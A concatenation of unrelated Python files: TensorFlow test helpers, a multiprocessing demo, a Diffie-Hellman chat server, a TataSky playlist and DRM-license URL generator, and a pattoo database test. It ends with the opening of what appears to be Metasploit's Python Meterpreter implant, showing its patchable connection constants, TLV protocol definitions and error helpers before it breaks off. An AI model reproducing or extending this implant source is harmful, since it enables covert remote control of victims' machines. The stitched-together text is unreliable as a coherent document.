"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
Read more at https://www.tensorflow.org/guide/extend/architecture

Figure illustrates the interaction of these components.
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
"""tf.gradients(...) implemented as tf.GradientTape context manager interface.
This is useful to test tf.gradients() in tests that uses tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
*WILL NOT* make the tf.function to run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
ValueError if `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
|
process_communication_with_queue.py
|
import multiprocessing
#SENTINEL = object() # no!
SENTINEL = 'STOP' # not empty obj instance, bacuse id's get messed up
def producer(q, n):
a, b = 0, 1
while a <= n:
q.put(a)
a, b = b, a + b
q.put(SENTINEL)
def consumer(q):
while True:
num = q.get()
if num == SENTINEL:
break
print(f'Got numba {num}')
q = multiprocessing.Queue() # not threading one
cns = multiprocessing.Process(target=consumer, args=(q, ))
prd = multiprocessing.Process(target=producer, args=(q, 35))
prd.start()
cns.start()
|
server.py
|
#!/usr/bin/env python
"""
SecureChat server: starts a server that routes chat messages.
"""
import socket
import threading
import sys
import binascii
import argparse
from M2Crypto import DH as M2DH
from dhke import DH, DH_SIZE, LEN_PK
from cipher import Message
__author__ = "spec"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Development"
# The number of unaccepted connections that the system will allow
# before refusing new connections.
BACKLOG = 5
# The default port the server should use.
DEFAULT_PORT = 39482
class Server:
def __init__(self, host='127.0.0.1', port=DEFAULT_PORT):
"""
Initialize a new server object.
:param host: IP address of the server
:param port: Port to use for the server
"""
print("SecureChat Sever v{}".format(__version__))
self.host = host
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Generate Diffie-Hellman Key Exchange Parameters
print("Generating a {}-bit prime...".format(DH_SIZE))
self.dh_params = M2DH.gen_params(DH_SIZE, 2)
print("Done!")
self.clients = []
# Start the server, break on ^C
try:
self.start()
except KeyboardInterrupt:
print("\rExiting...")
[self.disconnect(client) for client in self.clients]
self.socket.close()
sys.exit()
def start(self):
"""
Wait for clients to connect, perform DHKE with each new
connection, then listen for incoming messages.
"""
# Bind server socket
self.socket.bind((self.host, self.port))
print("Socket bound to {} on port {}".format(self.host, self.port))
# Start listening on the socket
self.socket.listen(BACKLOG)
print("Waiting for Clients...")
while True:
# Create a new socket for an incoming client
connection, address = self.socket.accept()
print("{} has connected".format(address[0]))
# Create new client object for this connection
client = Client(self, connection, address)
# Wait for next client if key exchange failed
if not client.key:
client.connection.close()
print("{} has disconnected".format(client.address[0]))
continue
print("Client Key: {}".format(binascii.hexlify(client.key).decode("utf-8")))
# Add client to list of clients on server
self.clients.append(client)
self.broadcast("{} has joined".format(client.address[0]), client, show_address=False)
# Listen for incoming messages from client
threading.Thread(target=self.listen, args=(client, )).start()
def listen(self, client):
"""
Receive and handle data from a client.
:param client: client to receive data from
"""
while True:
try:
# Wait for data from client
data = client.connection.recv(1024)
# Disconnect client if no data received
if not data:
self.disconnect(client)
break
print("{} [Raw]: {}".format(client.address[0], data))
# Parse data as cipher-text message
msg = Message(key=client.key, ciphertext=data)
print("{} [Decrypted]: {}".format(client.address[0], msg.plaintext))
if msg.plaintext == "!exit":
client.send("Acknowledged")
self.disconnect(client)
continue
self.broadcast(msg.plaintext, client)
# Disconnect client if unable to read from connection
except OSError:
self.disconnect(client)
break
def broadcast(self, content, from_client, show_address=True):
if show_address:
msg = from_client.address[0] + ": " + content
else:
msg = content
[client.send(msg) for client in self.clients if client is not from_client]
def disconnect(self, client):
"""
Disconnect a client from the server.
:param client: client to be disconnected
"""
client.connection.close()
if client in self.clients:
disconnect_msg = "{} has disconnected".format(client.address[0])
self.broadcast(disconnect_msg, client, show_address=False)
try:
self.clients.remove(client)
except ValueError:
pass
print(disconnect_msg)
class Client:
def __init__(self, server, connection, address, user=None):
"""
Initialize a new client on a server.
:param server: the server to which the client belongs
:param connection: the socket on which the server communicates with the client
:param address: the IP address and port of the client
:param user: the User object the client is logged in as (not yet implemented)
"""
self.connection = connection
self.address = address
self.user = user
self.key = self.dh(server.dh_params)
def dh(self, dh_params):
"""
Perform Diffie-Hellman Key Exchange with a client.
:param dh_params: p and g generated by DH
:return shared_key: shared encryption key for AES
"""
# p: shared prime
p = DH.b2i(dh_params.p)
# g: primitive root modulo
g = DH.b2i(dh_params.g)
# a: randomized private key
a = DH.gen_private_key()
# Generate public key from p, g, and a
public_key = DH.gen_public_key(g, a, p)
# Create a DH message to send to client as bytes
dh_message = bytes(DH(p, g, public_key))
self.connection.sendall(dh_message)
# Receive public key from client as bytes
try:
response = self.connection.recv(LEN_PK)
except ConnectionError:
print("Key Exchange with {} failed".format(self.address[0]))
return None
client_key = DH.b2i(response)
# Calculate shared key with newly received client key
shared_key = DH.get_shared_key(client_key, a, p)
return shared_key
def send(self, content):
"""
Encrypt and send a message to the client
:param content: plaintext content to be encrypted
"""
msg = Message(key=self.key, plaintext=content)
self.connection.sendall(msg.pack())
def decrypt(self, content):
"""
Decrypt an encrypted message.
:param content: encrypted message content to be decrypted
:return: decrypted message
"""
return Message(key=self.key, ciphertext=content).plaintext
if __name__ == '__main__':
# Get host and port arguments from the command-line
aparser = argparse.ArgumentParser()
aparser.add_argument("--host", default='127.0.0.1', help="IP address of the chat server")
aparser.add_argument("--port", default=DEFAULT_PORT, type=int, help="Port number the chat server is running on")
args = aparser.parse_args()
s = Server(host=args.host, port=args.port)
|
utils.py
|
import jwtoken as jwt
import threading
m3ustr = '#EXTM3U x-tvg-url="https://github.com/Shra1V32/epg/raw/master/epg.xml.gz" \n\n'
kodiPropLicenseType = "#KODIPROP:inputstream.adaptive.license_type=com.widevine.alpha"
def processTokenChunks(channelList):
global m3ustr
kodiPropLicenseUrl = ""
if not channelList:
print("Channel List is empty ..Exiting")
exit(1)
for channel in channelList:
ls_session_key = jwt.generateJWT(channel['channel_id'], iterative=False)
if ls_session_key != "":
licenseUrl = channel['channel_license_url'] + "&ls_session=" + ls_session_key
kodiPropLicenseUrl = "#KODIPROP:inputstream.adaptive.license_key=" + licenseUrl + "|Content-Type=application/octet-stream|R{SSM}|"
else:
print("Didn't get license for channel: Id: {0} Name:{1}".format(channel['channel_id'],
channel['channel_name']))
print('Continuing...Please get license manually for channel :', channel['channel_name'])
m3ustr += kodiPropLicenseType + "\n" + kodiPropLicenseUrl + "\n" + "#EXTINF:-1 "
m3ustr += "tvg-id=" + "\"" + "ts" + channel['channel_id'] + "\" " + "group-title=" + "\"" + channel['channel_genre'] + "\" " + "tvg-logo=\"" + channel[
'channel_logo'] + "\" ," + channel['channel_name'] + "\n" + channel['channel_url'] + "\n\n"
def m3ugen():
ts = []
global m3ustr
channelList = jwt.getUserChannelSubscribedList()
for i in range(0, len(channelList), 5):
t = threading.Thread(target=processTokenChunks, args=([channelList[i:i + 5]]))
ts.append(t)
t.start()
for t in ts:
t.join()
print("================================================================")
print("Found total {0} channels subscribed by user \nSaving them to m3u file".format(len(channelList)))
print("================================================================")
saveM3ustringtofile(m3ustr)
def saveM3ustringtofile(m3ustr):
with open("allChannelPlaylist.m3u", "w") as allChannelPlaylistFile:
allChannelPlaylistFile.write(m3ustr)
def getPrintNote():
s = " *****************************************************\n" + "Welcome To TataSky Channel Generation Script\n" + \
"**********************************************************\n" + \
"- Using this script you can generate playable links based on the channels you have subscribed to \n" + \
"- You can always read the README.md file if you don't know how to use the generated file \n" + \
"- You can login using your password or generate an OTP. You need to enter both the Registered Mobile Number \n" + \
"\n Caution: This doesn't promote any kind of hacking or compromising anyone's details"
return s
if __name__ == '__main__':
m3ugen()
|
test___init__.py
|
#!/usr/bin/env python3
"""Testing pattoo/db/db.py."""
import os
import unittest
import sys
from random import random, randint
import multiprocessing
from collections import namedtuple
# Try to create a working PYTHONPATH
EXEC_DIR = os.path.dirname(os.path.realpath(__file__))
ROOT_DIR = os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
os.path.abspath(os.path.join(
EXEC_DIR, os.pardir)), os.pardir)), os.pardir))
_EXPECTED = '{0}pattoo{0}tests{0}pattoo_{0}db'.format(os.sep)
if EXEC_DIR.endswith(_EXPECTED) is True:
# We need to prepend the path in case the repo has been installed
# elsewhere on the system using PIP. This could corrupt expected results
sys.path.insert(0, ROOT_DIR)
else:
print('''This script is not installed in the "{0}" directory. Please fix.\
'''.format(_EXPECTED))
sys.exit(2)
from tests.libraries.configuration import UnittestConfig
from pattoo_shared import data
from pattoo.db.table import language
class TestBasicFunctions(unittest.TestCase):
"""Checks all functions and methods."""
def test_main(self):
"""Testing method / function main."""
#
# NOTE!
#
# This test is to verify that multiprocessing is supported without
# hanging. We don't want database hanging if there is a large load of
# connections to the database. This is a very important test. It MUST
# pass for pattoo to be reliable.
# Initialize key variables
loops = 10
process_count = 100
timeout = 600
code = data.hashstring(str(random()))
names = [
data.hashstring(str(random())) for _ in range(loops)
]
Arguments = namedtuple('Arguments', 'loops process_count code names')
# Add an entry to the database
language.insert_row(code, names[0])
# Make sure it exists
idx_language = language.exists(code)
# Verify the index exists
result = language.idx_exists(idx_language)
self.assertTrue(result)
# Create arguments
arguments = Arguments(
code=code,
loops=loops,
names=names,
process_count=process_count
)
# Spawn a single process with a timeout
process = multiprocessing.Process(target=run_, args=(arguments,))
process.start()
process.join(timeout)
# Test if timing out
if process.is_alive():
# Multiprocessing is failing if this times out. I could be due to
# the loops taking too long (unlikely, but should be checked), or
# it could be a general failure in the database engine code in
# pattoo.db.__init__.py.
print('''\
Test for multiprocessing database update is hanging. Please check possible \
causes.''')
sys.exit(2)
def run_(arguments):
"""Run multiprocessing database updates.
Args:
None
Returns:
None
"""
# Create a list of arguments from a random list of names
args = [
(arguments.code, arguments.names[
randint(0, len(arguments.names) - 1)]) for _ in range(
arguments.process_count)
]
# Now spawn processes and update the table
for loop in range(arguments.loops):
print('Processing loop {}'.format(loop))
with multiprocessing.get_context(
'spawn').Pool(processes=arguments.process_count) as pool:
pool.starmap(language.update_name, args)
# Wait for all the processes to end and get results
pool.join()
if __name__ == '__main__':
# Make sure the environment is OK to run unittests
UnittestConfig().create()
# Do the unit test
unittest.main()
|
meterpreter.py
|
#!/usr/bin/python
# vim: tabstop=4 softtabstop=4 shiftwidth=4 noexpandtab
import binascii
import code
import os
import platform
import random
import re
import select
import socket
import struct
import subprocess
import sys
import threading
import time
import traceback
try:
import ctypes
except ImportError:
has_windll = False
else:
has_windll = hasattr(ctypes, 'windll')
# this MUST be imported for urllib to work on OSX
try:
import SystemConfiguration as osxsc
osxsc.SCNetworkInterfaceCopyAll()
has_osxsc = True
except ImportError:
has_osxsc = False
try:
urllib_imports = ['ProxyHandler', 'Request', 'build_opener', 'install_opener', 'urlopen']
if sys.version_info[0] < 3:
urllib = __import__('urllib2', fromlist=urllib_imports)
else:
urllib = __import__('urllib.request', fromlist=urllib_imports)
except ImportError:
has_urllib = False
else:
has_urllib = True
if sys.version_info[0] < 3:
is_str = lambda obj: issubclass(obj.__class__, str)
is_bytes = lambda obj: issubclass(obj.__class__, str)
bytes = lambda *args: str(*args[:1])
NULL_BYTE = '\x00'
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, str) else x)
else:
if isinstance(__builtins__, dict):
is_str = lambda obj: issubclass(obj.__class__, __builtins__['str'])
str = lambda x: __builtins__['str'](x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
else:
is_str = lambda obj: issubclass(obj.__class__, __builtins__.str)
str = lambda x: __builtins__.str(x, *(() if isinstance(x, (float, int)) else ('UTF-8',)))
is_bytes = lambda obj: issubclass(obj.__class__, bytes)
NULL_BYTE = bytes('\x00', 'UTF-8')
long = int
unicode = lambda x: (x.decode('UTF-8') if isinstance(x, bytes) else x)
#
# Constants
#
# these values will be patched, DO NOT CHANGE THEM
DEBUGGING = False
HTTP_CONNECTION_URL = None
HTTP_PROXY = None
HTTP_USER_AGENT = None
PAYLOAD_UUID = ''
SESSION_COMMUNICATION_TIMEOUT = 300
SESSION_EXPIRATION_TIMEOUT = 604800
SESSION_RETRY_TOTAL = 3600
SESSION_RETRY_WAIT = 10
PACKET_TYPE_REQUEST = 0
PACKET_TYPE_RESPONSE = 1
PACKET_TYPE_PLAIN_REQUEST = 10
PACKET_TYPE_PLAIN_RESPONSE = 11
ERROR_SUCCESS = 0
# not defined in original C implementation
ERROR_FAILURE = 1
ERROR_FAILURE_PYTHON = 2
ERROR_FAILURE_WINDOWS = 3
CHANNEL_CLASS_BUFFERED = 0
CHANNEL_CLASS_STREAM = 1
CHANNEL_CLASS_DATAGRAM = 2
CHANNEL_CLASS_POOL = 3
#
# TLV Meta Types
#
TLV_META_TYPE_NONE = ( 0 )
TLV_META_TYPE_STRING = (1 << 16)
TLV_META_TYPE_UINT = (1 << 17)
TLV_META_TYPE_RAW = (1 << 18)
TLV_META_TYPE_BOOL = (1 << 19)
TLV_META_TYPE_QWORD = (1 << 20)
TLV_META_TYPE_COMPRESSED = (1 << 29)
TLV_META_TYPE_GROUP = (1 << 30)
TLV_META_TYPE_COMPLEX = (1 << 31)
# not defined in original
TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
#
# TLV base starting points
#
TLV_RESERVED = 0
TLV_EXTENSIONS = 20000
TLV_USER = 40000
TLV_TEMP = 60000
#
# TLV Specific Types
#
TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
TLV_TYPE_CHANNEL_PARENTID = TLV_META_TYPE_UINT | 55
TLV_TYPE_SEEK_WHENCE = TLV_META_TYPE_UINT | 70
TLV_TYPE_SEEK_OFFSET = TLV_META_TYPE_UINT | 71
TLV_TYPE_SEEK_POS = TLV_META_TYPE_UINT | 72
TLV_TYPE_EXCEPTION_CODE = TLV_META_TYPE_UINT | 300
TLV_TYPE_EXCEPTION_STRING = TLV_META_TYPE_STRING | 301
TLV_TYPE_LIBRARY_PATH = TLV_META_TYPE_STRING | 400
TLV_TYPE_TARGET_PATH = TLV_META_TYPE_STRING | 401
TLV_TYPE_MIGRATE_PID = TLV_META_TYPE_UINT | 402
TLV_TYPE_MIGRATE_LEN = TLV_META_TYPE_UINT | 403
TLV_TYPE_TRANS_TYPE = TLV_META_TYPE_UINT | 430
TLV_TYPE_TRANS_URL = TLV_META_TYPE_STRING | 431
TLV_TYPE_TRANS_UA = TLV_META_TYPE_STRING | 432
TLV_TYPE_TRANS_COMM_TIMEOUT = TLV_META_TYPE_UINT | 433
TLV_TYPE_TRANS_SESSION_EXP = TLV_META_TYPE_UINT | 434
TLV_TYPE_TRANS_CERT_HASH = TLV_META_TYPE_RAW | 435
TLV_TYPE_TRANS_PROXY_HOST = TLV_META_TYPE_STRING | 436
TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
TLV_TYPE_CIPHER_NAME = TLV_META_TYPE_STRING | 500
TLV_TYPE_CIPHER_PARAMETERS = TLV_META_TYPE_GROUP | 501
TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
EXPORTED_SYMBOLS = {}
EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING
def export(symbol):
EXPORTED_SYMBOLS[symbol.__name__] = symbol
return symbol
def generate_request_id():
chars = 'abcdefghijklmnopqrstuvwxyz'
return ''.join(random.choice(chars) for x in range(32))
@export
def crc16(data):
poly = 0x1021
reg = 0x0000
if is_str(data):
data = list(map(ord, data))
elif is_bytes(data):
data = list(data)
data.append(0)
data.append(0)
for byte in data:
mask = 0x80
while mask > 0:
reg <<= 1
if byte & mask:
reg += 1
mask >>= 1
if reg > 0xffff:
reg &= 0xffff
reg ^= poly
return reg
@export
def error_result(exception=None):
if not exception:
_, exception, _ = sys.exc_info()
exception_crc = crc16(exception.__class__.__name__)
if exception_crc == 0x4cb2: # WindowsError
return error_result_windows(exception.errno)
else:
result = ((exception_crc << 16) | ERROR_FAILURE_PYTHON)
return result
@export
def error_result_windows(error_number=None):
if not has_windll:
return ERROR_FAILURE
if error_number == None:
